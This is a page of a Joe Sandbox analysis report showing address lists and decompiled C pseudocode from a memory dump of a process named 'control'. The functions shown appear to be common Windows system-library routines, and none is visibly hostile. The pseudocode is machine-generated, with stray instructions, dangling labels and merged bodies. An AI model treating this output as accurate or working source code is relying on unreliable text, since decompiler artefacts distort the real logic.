0x04cda495
0x00000000
0x04cda495
0x04cda480
0x04cda485
0x04cda48a
0x04d1dff8
0x04d1dffd
0x04d1e002
0x04d1dfb5
0x00000000
0x04d1dfb5
0x04d1e004
0x04d1e009
0x00000000
0x04d1e009
0x04cda490
0x00000000
0x04cda490
0x04cda420
0x04cda427
0x04d1dfc2
0x00000000
0x00000000
0x04d1dfc8
0x04cda430
0x00000000
0x00000000
0x04cda435
0x04cda43d
0x04d1dfcd
0x04d1dfd5
0x04d1dfd8
0x04d1dfdd
0x04d1dfe0
0x04cda443
0x04cda443
0x04cda445
0x04cda445
0x04cda44e
0x04cda450
0x04cda450
0x04cda453
0x04cda458
0x04cda458
0x04cda45f
0x04cda462
0x04cda468
0x04cda46e
0x00000000
0x04cda46e
0x04cda3e6
0x04cda3e6
0x04cda3e7
0x04cda3e7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93479b50c9361601e42dca20025fdf3377dd2cbc10b9f1d744344985e53a72f8
Instruction ID: b54cba32bd69706282bf15b51b442a20af64c4afa6eae32dc569e2af4a732ed7
Opcode Fuzzy Hash: 93479b50c9361601e42dca20025fdf3377dd2cbc10b9f1d744344985e53a72f8
Instruction Fuzzy Hash: 0941E132A44204DFDB11DF68D4947AD77B2FB08314F18115AD911AB390EB7AFE10DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CA88C8 Relevance: .1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E04CA88C8(signed int __ecx, signed int __edx) {
				signed int _v8;
				char _v40;
				void* _v80;
				short _v82;
				char _v84;
				signed short* _v88;
				char _v92;
				void* _v96;
				void* _v98;
				void* _v100;
				void* _v104;
				void* _v106;
				void* _v108;
				void* _v112;
				void* _v120;
				void* _v122;
				void* _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				short _t41;
				void* _t43;
				short _t45;
				void* _t65;
				short* _t71;
				void* _t72;
				void* _t74;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t69 = __edx;
				_t79 = (_t77 & 0xfffffff8) - 0x5c;
				_v8 =  *0x4dab370 ^ _t79;
				_t71 = __edx;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				if(__edx == 0) {
					_t37 = 0xc000000d;
					L7:
					_pop(_t72);
					_pop(_t74);
					_pop(_t65);
					return E04CF4B50(_t37, _t65, _v8 ^ _t79, _t69, _t72, _t74);
				}
				_t75 = __ecx & 0x0000ffff;
				 *((short*)(__edx)) = 0;
				_v80 =  &_v40;
				_t41 = 0x1e;
				_v82 = _t41;
				_t43 = E04CD5A40(__edx, __ecx & 0x0000ffff,  &_v84, 2, 0);
				if(_t43 < 0) {
					if(_t43 == 0xc0000023) {
						_v80 = 0;
						_v82 = 0;
						_t43 = E04CD5A40(__edx, _t75,  &_v84, 2, 1);
					}
					if(_t43 >= 0) {
						goto L2;
					} else {
						_t76 = 0xc000000d;
						L4:
						if(_v88 != _t79 + 0x24) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v88);
						}
						if(_v80 !=  &_v40) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v80);
						}
						_t37 = _t76;
						goto L7;
					}
				}
				L2:
				_v88 = _t79 + 0x28;
				_t45 = 0x1e;
				 *((short*)(_t79 + 0x16)) = _t45;
				_t76 = E04CD41D0(_t69, _v80,  &_v92, 6, 0);
				if(_t76 < 0) {
					if(_t76 == 0xc0000023) {
						_v88 = 0;
						 *((short*)(_t79 + 0x16)) = 0;
						_t76 = E04CD41D0(_t69, _v80,  &_v92, 6, 1);
					}
					if(_t76 < 0) {
						goto L4;
					} else {
						goto L3;
					}
				}
				L3:
				if(0 != _v92) {
					_t76 = E04CD5890(_v88, _t79 + 0x24, 3);
					if(_t76 >= 0) {
						 *_t71 =  *((intOrPtr*)(_t79 + 0x20));
					}
				}
				goto L4;
			}

0x04ca88c8
0x04ca88d0
0x04ca88da
0x04ca88e3
0x04ca88e5
0x04ca88e9
0x04ca88ed
0x04ca88f1
0x04ca88f7
0x04d0b489
0x04ca897d
0x04ca8981
0x04ca8982
0x04ca8983
0x04ca898e
0x04ca898e
0x04ca88ff
0x04ca8902
0x04ca890b
0x04ca890f
0x04ca8911
0x04ca891e
0x04ca8925
0x04d0b498
0x04d0b49c
0x04d0b4a2
0x04d0b4af
0x04d0b4af
0x04d0b4b6
0x00000000
0x04d0b4bc
0x04d0b4bc
0x04ca895f
0x04ca8967
0x04d0b508
0x04d0b508
0x04ca8975
0x04d0b520
0x04d0b520
0x04ca897b
0x00000000
0x04ca897b
0x04d0b4b6
0x04ca892b
0x04ca8931
0x04ca8935
0x04ca8937
0x04ca894c
0x04ca8950
0x04d0b4cc
0x04d0b4d0
0x04d0b4d6
0x04d0b4eb
0x04d0b4eb
0x04d0b4ef
0x00000000
0x04d0b4f5
0x00000000
0x04d0b4f5
0x04d0b4ef
0x04ca8956
0x04ca895d
0x04ca899f
0x04ca89a3
0x04ca89aa
0x04ca89aa
0x04ca89a3
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2c0bc7635229d9682d8d3acfa66f72de369fffbad07e42c99babb4247b147b
Instruction ID: 4ecf7d36da5a164d1f0bbaad7de21fc7546f2d2b15810d43efdab26d9a70e219
Opcode Fuzzy Hash: 4b2c0bc7635229d9682d8d3acfa66f72de369fffbad07e42c99babb4247b147b
Instruction Fuzzy Hash: 33415E315083069FD311DF65D840A6BB7EAFF84B58F00492AFA94D7190E730EE589BA3

Uniqueness

Uniqueness Score: -1.00%

Function 04CB08CD Relevance: .1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04CB08CD(char __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				void* _v8;
				void* _v20;
				intOrPtr _t57;
				intOrPtr* _t59;
				void* _t61;
				short _t66;
				intOrPtr* _t69;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t77;
				short _t81;
				void* _t98;
				intOrPtr _t99;
				intOrPtr _t102;
				signed int* _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t108;
				intOrPtr* _t110;
				signed int* _t111;
				short* _t115;
				signed int _t116;
				intOrPtr* _t119;

				_t105 = __edx;
				_t101 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				_t108 =  *0x4da664c; // 0x2f1c538
				if(__edx != 0) {
					_t57 = 0xc000000d;
					goto L13;
				} else {
					_t1 = _t108 + 4; // 0x2f1c53c
					_t98 = _t1;
					L04CB53C0(_t98);
					_t110 = _t108 + 8;
					_t59 =  *_t110;
					if(_t59 == _t110) {
						L5:
						E04CB52F0(_t101, _t98);
						_t61 = 0x70;
						_t115 = E04CC5D90(_t101,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						if(_t115 == 0) {
							_t57 = 0xc0000017;
							goto L13;
						} else {
							E04CF8F40(_t115, 0, 0x70);
							 *_t115 = 0x912;
							_t66 = 0x70;
							 *((short*)(_t115 + 2)) = _t66;
							 *((intOrPtr*)(_t115 + 0x10)) = _a4;
							 *((intOrPtr*)(_t115 + 0x14)) = _a8;
							_t13 = _t115 + 0x2c; // 0x2c
							_t69 = _t13;
							 *((intOrPtr*)(_t69 + 4)) = _t69;
							 *_t69 = _t69;
							 *((intOrPtr*)(_t115 + 0x50)) = 1;
							 *((intOrPtr*)(_t115 + 0x5c)) = 0;
							 *((intOrPtr*)(_t115 + 0x58)) = 0;
							 *((intOrPtr*)(_t115 + 8)) = 0;
							 *((intOrPtr*)(_t115 + 0xc)) = 0;
							L04CC2330(0, _t98);
							_t72 =  *_t110;
							while(_t72 != _t110) {
								_t21 = _t72 - 0x1c; // -28
								_t104 = _t21;
								_t105 = _a8;
								if( *((intOrPtr*)(_t104 + 0x10)) == _a4) {
									if( *((intOrPtr*)(_t104 + 0x14)) != _t105) {
										goto L9;
									} else {
										asm("lock inc dword [ecx+0x50]");
										 *_v8 = _t104;
										E04CC24D0(_t98);
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t115);
										goto L12;
									}
								} else {
									L9:
									_t72 =  *_t72;
									continue;
								}
								goto L26;
							}
							_t102 =  *_t110;
							_t24 = _t115 + 0x1c; // 0x1c
							_t73 = _t24;
							if( *((intOrPtr*)(_t102 + 4)) != _t110) {
								_t103 = 3;
								asm("int 0x29");
								_push(_t98);
								_push(_t115);
								_push(_t110);
								_t74 = 0x68;
								_t111 = _t103;
								_t99 = _t105;
								 *_t111 =  *_t111 & 0x00000000;
								_t116 = E04CC5D90(_t103,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t74);
								if(_t116 == 0) {
									_t77 = 0xc0000017;
								} else {
									_t32 = _t116 + 4; // 0x4
									E04CF8F40(_t32, 0, 0x64);
									 *_t111 = _t116;
									 *_t116 = 0x914;
									_t81 = 0x68;
									 *((short*)(_t116 + 2)) = _t81;
									 *((intOrPtr*)(_t116 + 0x18)) =  *((intOrPtr*)( *[fs:0x18] + 0xf60));
									 *((intOrPtr*)(_t116 + 0x10)) = _v0;
									 *((intOrPtr*)(_t116 + 0x14)) = _a4;
									 *((intOrPtr*)(_t116 + 0x28)) = _a8;
									 *((intOrPtr*)(_t116 + 0x20)) = _a12;
									 *((intOrPtr*)(_t116 + 0x24)) = _a16;
									_t77 = 0;
									 *((intOrPtr*)(_t116 + 0x1c)) = _t99;
									 *((intOrPtr*)(_t116 + 0xc)) = 0;
									 *((intOrPtr*)(_t116 + 0x2c)) = 1;
									 *((intOrPtr*)(_t116 + 0x30)) = 0;
									 *((intOrPtr*)(_t116 + 0x34)) = 0;
									 *((intOrPtr*)(_t116 + 0x38)) = 0;
									 *((intOrPtr*)(_t116 + 0x3c)) = 0;
									 *((intOrPtr*)(_t116 + 0x60)) = 0;
									 *((intOrPtr*)(_t116 + 0x64)) = 0;
								}
								return _t77;
							} else {
								 *_t73 = _t102;
								 *((intOrPtr*)(_t73 + 4)) = _t110;
								 *((intOrPtr*)(_t102 + 4)) = _t73;
								 *_t110 = _t73;
								 *_v8 = _t115;
								E04CC24D0(_t98);
								goto L12;
							}
						}
					} else {
						_t105 = _a8;
						do {
							_t4 = _t59 - 0x1c; // -28
							_t101 = _t4;
							_t119 = _v8;
							if( *((intOrPtr*)(_t101 + 0x10)) == _a4) {
								if( *((intOrPtr*)(_t101 + 0x14)) != _t105) {
									goto L4;
								} else {
									asm("lock inc dword [ecx+0x50]");
									 *_t119 = _t101;
									E04CB52F0(_t101, _t98);
									L12:
									_t57 = 0;
									L13:
									return _t57;
								}
							} else {
								goto L4;
							}
							goto L26;
							L4:
							_t59 =  *_t59;
						} while (_t59 != _t110);
						goto L5;
					}
				}
				L26:
			}

0x04cb08cd
0x04cb08cd
0x04cb08d5
0x04cb08d6
0x04cb08dc
0x04cb08e4
0x04d0eac5
0x00000000
0x04cb08ea
0x04cb08ea
0x04cb08ea
0x04cb08ee
0x04cb08f3
0x04cb08f6
0x04cb08fa
0x04cb0918
0x04cb0919
0x04cb0920
0x04cb0932
0x04cb0936
0x04d0eacf
0x00000000
0x04cb093c
0x04cb0941
0x04cb094e
0x04cb0953
0x04cb0954
0x04cb095b
0x04cb0961
0x04cb0964
0x04cb0964
0x04cb0967
0x04cb096a
0x04cb096f
0x04cb0976
0x04cb0979
0x04cb097c
0x04cb097f
0x04cb0982
0x04cb0987
0x04cb0989
0x04cb0990
0x04cb0990
0x04cb0996
0x04cb0999
0x04cb09e4
0x00000000
0x04cb09e6
0x04d0ead9
0x04d0eae2
0x04d0eae4
0x04d0eaf5
0x00000000
0x04d0eaf5
0x04cb099b
0x04cb099b
0x04cb099b
0x00000000
0x04cb099b
0x00000000
0x04cb0999
0x04cb099f
0x04cb09a1
0x04cb09a1
0x04cb09a7
0x04cb09ed
0x04cb09ee
0x04cb09f5
0x04cb09f6
0x04cb09f7
0x04cb09fa
0x04cb0a02
0x04cb0a06
0x04cb0a0b
0x04cb0a13
0x04cb0a17
0x04cb0a8f
0x04cb0a19
0x04cb0a1b
0x04cb0a21
0x04cb0a29
0x04cb0a30
0x04cb0a35
0x04cb0a36
0x04cb0a46
0x04cb0a4c
0x04cb0a52
0x04cb0a58
0x04cb0a5e
0x04cb0a64
0x04cb0a67
0x04cb0a69
0x04cb0a6c
0x04cb0a6f
0x04cb0a76
0x04cb0a79
0x04cb0a7c
0x04cb0a7f
0x04cb0a82
0x04cb0a85
0x04cb0a85
0x04cb0a8c
0x04cb09a9
0x04cb09a9
0x04cb09ab
0x04cb09ae
0x04cb09b1
0x04cb09b8
0x04cb09ba
0x00000000
0x04cb09ba
0x04cb09a7
0x04cb08fc
0x04cb08fc
0x04cb08ff
0x04cb0902
0x04cb0902
0x04cb0908
0x04cb090c
0x04cb09cd
0x00000000
0x04cb09d3
0x04cb09d3
0x04cb09d8
0x04cb09da
0x04cb09bf
0x04cb09bf
0x04cb09c1
0x04cb09c7
0x04cb09c7
0x00000000
0x00000000
0x00000000
0x00000000
0x04cb0912
0x04cb0912
0x04cb0914
0x00000000
0x04cb08ff
0x04cb08fa
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69cce475ccfc70bdbc2310b8b144780d90028699568f9d2512959817b0f34bef
Instruction ID: 568428ea5acf800f217b434d589a1f207ce07b280b114773784893a0f46782ea
Opcode Fuzzy Hash: 69cce475ccfc70bdbc2310b8b144780d90028699568f9d2512959817b0f34bef
Instruction Fuzzy Hash: DE415D71A00700EFE721DF19D840B66B7E6FF44318F24896AE589CB251E771F942DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0630 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
Instruction ID: 37171811a80551cf7f50180a06863c087d12b3c8a918f02d955ed9d2c4fc555a
Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
Instruction Fuzzy Hash: 51414871A00615EFDB24CF9AC980AAAB7FAFF48700B10496DE556E7250E770FA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CB254C Relevance: .1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04CB254C(void* __ebx, intOrPtr __ecx, signed int __edi, void* __esi, void* __eflags) {
				signed int _v4;
				intOrPtr _v16;
				intOrPtr _v128;
				intOrPtr* _v132;
				char _v180;
				intOrPtr _v184;
				signed int _t41;
				void* _t50;
				void* _t61;
				intOrPtr _t66;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int _t75;
				intOrPtr _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t84;
				intOrPtr* _t85;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t92;
				void* _t108;

				_t61 = __ebx;
				_push(0xa8);
				_push(0x4d8bbe0);
				E04D07C40(__ebx, __edi, __esi);
				_t89 = __ecx;
				_v184 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					E04CEC819(__ebx, __ecx, _t78, __edi, __ecx, __eflags);
					_t66 =  *((intOrPtr*)(__ecx + 8));
					_t82 = __edi | 0xffffffff;
					__eflags = _t82;
					asm("lock xadd [ecx], eax");
					if(_t82 == 0) {
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)),  *0x4da6644, _t66);
					}
				} else {
					_t82 = __edi | 0xffffffff;
				}
				if( *((intOrPtr*)(_t89 + 0x38)) != _t82) {
					_push( *((intOrPtr*)(_t89 + 0x38)));
					L20();
				}
				_t39 =  *((intOrPtr*)(_t89 + 0x5c));
				if( *((intOrPtr*)(_t89 + 0x5c)) == 0) {
					L04CC2330(_t39, 0x4da8a30);
					_v4 = 1;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t67 =  *(_t41 + 4);
					__eflags =  *(_t79 + 4) - _t41;
					if( *(_t79 + 4) != _t41) {
						goto L19;
					} else {
						__eflags =  *_t67 - _t41;
						if( *_t67 != _t41) {
							goto L19;
						} else {
							 *_t67 = _t79;
							 *(_t79 + 4) = _t67;
							 *(_t41 + 4) = _t41;
							 *_t41 = _t41;
							_v4 = 0xfffffffe;
							_t50 = E04D0FC88();
							goto L10;
						}
					}
				} else {
					L04CC2330(_t39 + 0x2c, _t39 + 0x2c);
					_v4 = _v4 & 0x00000000;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t75 =  *(_t41 + 4);
					if( *(_t79 + 4) != _t41 ||  *_t75 != _t41) {
						L19:
						_t68 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t61);
						_push(_t89);
						_t90 = _v4;
						_push(_t82);
						__eflags = _t90;
						if(_t90 != 0) {
							_t41 = _t90 - 0x00000001 | 0x00000007;
							__eflags = _t41 - 0xffffffff;
							if(_t41 != 0xffffffff) {
								__eflags =  *_t90;
								if( *_t90 > 0) {
									__eflags =  *_t90 - 0x7fffffff;
									if( *_t90 != 0x7fffffff) {
										while(1) {
											_t80 =  *_t90;
											__eflags = _t80 - 0x7fffffff;
											if(_t80 == 0x7fffffff) {
												break;
											}
											_t84 = _t80 - 1;
											_t41 = _t80;
											_t68 = _t84;
											asm("lock cmpxchg [esi], ecx");
											__eflags = _t41 - _t80;
											if(_t41 != _t80) {
												continue;
											}
											L27:
											__eflags =  *0x4da6910;
											if( *0x4da6910 != 0) {
												asm("lock xadd [esi+0xe8], eax");
												_t41 = E04CDC000(_t68, 1, 4, 0xbadc99 + _t90, 0);
											}
											__eflags = _t84;
											if(_t84 == 0) {
												__eflags =  *0x4da6911;
												_t69 = _t90;
												if(__eflags != 0) {
													_t41 = E04D3DA40(0x7fffffff, _t69, _t84, _t90, __eflags);
												} else {
													_t41 = E04CA92AF(_t69);
												}
											}
											goto L21;
										}
										_t84 = 0x7fffffff;
										goto L27;
									}
								}
							}
						}
						L21:
						return _t41;
					} else {
						 *_t75 = _t79;
						 *(_t79 + 4) = _t75;
						 *(_t41 + 4) = _t41;
						 *_t41 = _t41;
						_v4 = 0xfffffffe;
						_t50 = E04CB2688(_t89);
						_t76 =  *((intOrPtr*)(_t89 + 0x5c));
						_t108 = _t76 -  *0x4da6890; // 0x2f107c0
						if(_t108 != 0) {
							__eflags = _t76 -  *0x4da6888; // 0x0
							if(__eflags != 0) {
								asm("lock xadd [ecx], edi");
								_t87 = _t82 - 1;
								__eflags = _t82 - 1;
								if(__eflags == 0) {
									_t50 = E04CAB705(_t61, _t76, _t87, _t89, __eflags);
								}
							} else {
								_t79 = 0x4da688c;
								_t77 = 0x4da6888;
								goto L9;
							}
						} else {
							_t79 = 0x4da6894;
							_t77 = 0x4da6890;
							L9:
							_t50 = E04CB2712(_t61, _t77, _t79, _t82, _t89, _t108);
						}
						L10:
						_t85 =  *((intOrPtr*)(_t89 + 0x10));
						if(_t85 != 0) {
							E04CF8F40( &_v180, 0, 0x98);
							_v132 = _t85;
							_t92 =  *((intOrPtr*)(_t89 + 0x34));
							_v128 = _t92;
							E04CB6D60( &_v180);
							 *0x4da91e0( &_v180, _t92);
							 *_t85();
							_t50 = E04CB61C3( &_v180, _t79);
						}
						 *[fs:0x0] = _v16;
						return _t50;
					}
				}
			}

0x04cb254c
0x04cb254c
0x04cb2551
0x04cb2556
0x04cb255b
0x04cb255d
0x04cb2567
0x04cb2645
0x04cb264a
0x04cb264d
0x04cb264d
0x04cb2652
0x04cb2656
0x04d0fc1b
0x04d0fc1b
0x04cb256d
0x04cb256d
0x04cb256d
0x04cb2573
0x04cb2575
0x04cb2578
0x04cb2578
0x04cb257d
0x04cb2582
0x04d0fc42
0x04d0fc47
0x04d0fc4e
0x04d0fc51
0x04d0fc53
0x04d0fc56
0x04d0fc59
0x00000000
0x04d0fc5f
0x04d0fc5f
0x04d0fc61
0x00000000
0x04d0fc67
0x04d0fc67
0x04d0fc69
0x04d0fc6c
0x04d0fc6f
0x04d0fc71
0x04d0fc78
0x00000000
0x04d0fc78
0x04d0fc61
0x04cb2588
0x04cb258c
0x04cb2591
0x04cb2595
0x04cb2598
0x04cb259a
0x04cb25a0
0x04cb2695
0x04cb2697
0x04cb2698
0x04cb269a
0x04cb269b
0x04cb269c
0x04cb269d
0x04cb269e
0x04cb269f
0x04cb26a5
0x04cb26a6
0x04cb26a7
0x04cb26aa
0x04cb26ab
0x04cb26ad
0x04cb26b9
0x04cb26bc
0x04cb26bf
0x04cb26c1
0x04cb26c4
0x04cb26cb
0x04cb26cd
0x04cb26cf
0x04cb26cf
0x04cb26d1
0x04cb26d3
0x00000000
0x00000000
0x04cb26d5
0x04cb26d8
0x04cb26da
0x04cb26dc
0x04cb26e0
0x04cb26e2
0x00000000
0x00000000
0x04cb26e4
0x04cb26e4
0x04cb26eb
0x04d0fc96
0x04d0fcb3
0x04d0fcb3
0x04cb26f1
0x04cb26f3
0x04cb26f5
0x04cb26fc
0x04cb26fe
0x04cb270b
0x04cb2700
0x04cb2700
0x04cb2700
0x04cb26fe
0x00000000
0x04cb26f3
0x04cb2707
0x00000000
0x04cb2707
0x04cb26cd
0x04cb26c4
0x04cb26bf
0x04cb26af
0x04cb26b3
0x04cb25ae
0x04cb25ae
0x04cb25b0
0x04cb25b3
0x04cb25b6
0x04cb25b8
0x04cb25bf
0x04cb25c4
0x04cb25c7
0x04cb25cd
0x04cb2661
0x04cb2667
0x04cb2678
0x04cb267c
0x04cb267c
0x04cb267d
0x04d0fc33
0x04d0fc33
0x04cb2669
0x04cb2669
0x04cb266e
0x00000000
0x04cb266e
0x04cb25d3
0x04cb25d3
0x04cb25d8
0x04cb25dd
0x04cb25dd
0x04cb25dd
0x04cb25e2
0x04cb25e2
0x04cb25e7
0x04cb2607
0x04cb260f
0x04cb2615
0x04cb2618
0x04cb2621
0x04cb2630
0x04cb2636
0x04cb263e
0x04cb263e
0x04cb25ec
0x04cb25f8
0x04cb25f8
0x04cb25a0

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90578a172a0cb5cc04e4277d2a7c467f6a6269ce962b778e3ace7a79c1d4391c
Instruction ID: 9bc34c081c1dfa8ff8f398aa72c74175049c2b53bb1c886df46792a5e55ff7bb
Opcode Fuzzy Hash: 90578a172a0cb5cc04e4277d2a7c467f6a6269ce962b778e3ace7a79c1d4391c
Instruction Fuzzy Hash: 4641BF71A01704CFD721EF24C954BA9B7B6FF48318F1486DAC0869B2A0EB30FA41DB81

Uniqueness

Uniqueness Score: -1.00%

Function 04D30443 Relevance: .1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04D30443(signed int __ecx, char _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v16;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v116;
				signed int _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				intOrPtr _v144;
				unsigned short _v152;
				void* _v156;
				void* _v160;
				void* _v172;
				void* _v176;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				intOrPtr _t68;
				void* _t69;
				void* _t71;
				signed int _t74;
				char _t76;
				void* _t77;
				signed int _t79;
				signed int _t80;
				void* _t81;
				signed int _t83;
				signed int _t85;

				_t70 = __ecx;
				_t85 = (_t83 & 0xfffffff8) - 0x94;
				_v8 =  *0x4dab370 ^ _t85;
				_t74 =  *0x4da65fc; // 0x870e43ac
				_t68 = _a8;
				_v128 = _t68;
				_t79 =  *0x4da5d38; // 0xaacf001a
				_t76 = _a4;
				_v132 = _t76;
				if(_t74 == 0) {
					_push(_t74);
					_push(4);
					_push( &_v136);
					_push(0x24);
					_push(0xffffffff);
					if(E04CF2B20() < 0) {
						L2:
						L04D08AA0(_t70, _t74, _t54);
					}
					_t74 = _v136;
					 *0x4da65fc = _t74;
				}
				_t71 = 0x20;
				_t70 = _t71 - (_t74 & 0x0000001f);
				asm("ror esi, cl");
				_t80 = _t79 ^ _t74;
				if(_t80 == 0) {
					_t46 = E04D68890(_t68, _t74, _t76, _t80, __eflags,  &_v132, 0x4c850b4);
				} else {
					_t70 = _t80;
					 *0x4da91e0( &_v132);
					_t46 =  *_t80();
				}
				if(_t46 != 0xffffffff) {
					_t79 = 0;
					if(E04CAE0E0(0x4c91298, 0, 0, _t85 + 0x10) == 0) {
						_push(2);
						_t74 =  *( *[fs:0x30] + 0x10);
						_v32 = _v32 & 0x00000000;
						_v152 =  *(_t74 + 0x38) >> 1;
						_v40 = 0;
						_v44 =  &_v152;
						_v36 = 0;
						_t70 =  *(_t74 + 0x38) & 0x0000ffff;
						_v24 = _v24 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v28 =  *((intOrPtr*)(_t74 + 0x3c));
						 *(_t85 + 0x90) =  *(_t74 + 0x38) & 0x0000ffff;
						E04CE1280(_t68,  *((intOrPtr*)(_t85 + 0x20)), _v144, 0x4c91268, 0,  &_v44);
						_t79 = 0;
						E04CD9A00( *(_t74 + 0x38) & 0x0000ffff,  *((intOrPtr*)(_t85 + 0x18)),  *((intOrPtr*)(_t85 + 0x18)), 0);
					}
					 *((intOrPtr*)(_t85 + 0x34)) =  *((intOrPtr*)(_t68 + 0xb8));
					_v124 = 0xc000041d;
					_push(_t79);
					_v120 =  *(_t76 + 4) | 0x00000001;
					_push(_t68);
					_push( &_v124);
					_v116 = _t76;
					 *(_t85 + 0x44) = _t79;
					_t54 = E04CF4010();
					goto L2;
				}
				_pop(_t77);
				_pop(_t81);
				_pop(_t69);
				__eflags = _v8 ^ _t85;
				return E04CF4B50(_t46, _t69, _v8 ^ _t85, _t74, _t77, _t81);
			}

0x04d30443
0x04d3044b
0x04d30458
0x04d3045f
0x04d30466
0x04d30469
0x04d3046e
0x04d30475
0x04d30478
0x04d3047e
0x04d30480
0x04d30481
0x04d30487
0x04d30488
0x04d3048a
0x04d30493
0x04d30495
0x04d30496
0x04d30496
0x04d3049b
0x04d3049f
0x04d3049f
0x04d304ac
0x04d304ad
0x04d304b3
0x04d304b5
0x04d304b7
0x04d304cc
0x04d304b9
0x04d304ba
0x04d304bc
0x04d304c2
0x04d304c2
0x04d304d4
0x04d304de
0x04d304ef
0x04d304fb
0x04d304fd
0x04d30504
0x04d3050f
0x04d30518
0x04d30520
0x04d30524
0x04d3052b
0x04d30532
0x04d3053a
0x04d30542
0x04d3054b
0x04d30565
0x04d3056a
0x04d30575
0x04d30575
0x04d30580
0x04d3058a
0x04d30592
0x04d30593
0x04d3059b
0x04d3059c
0x04d3059d
0x04d305a1
0x04d305a5
0x00000000
0x04d305a5
0x04d305b6
0x04d305b7
0x04d305b8
0x04d305b9
0x04d305c3

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
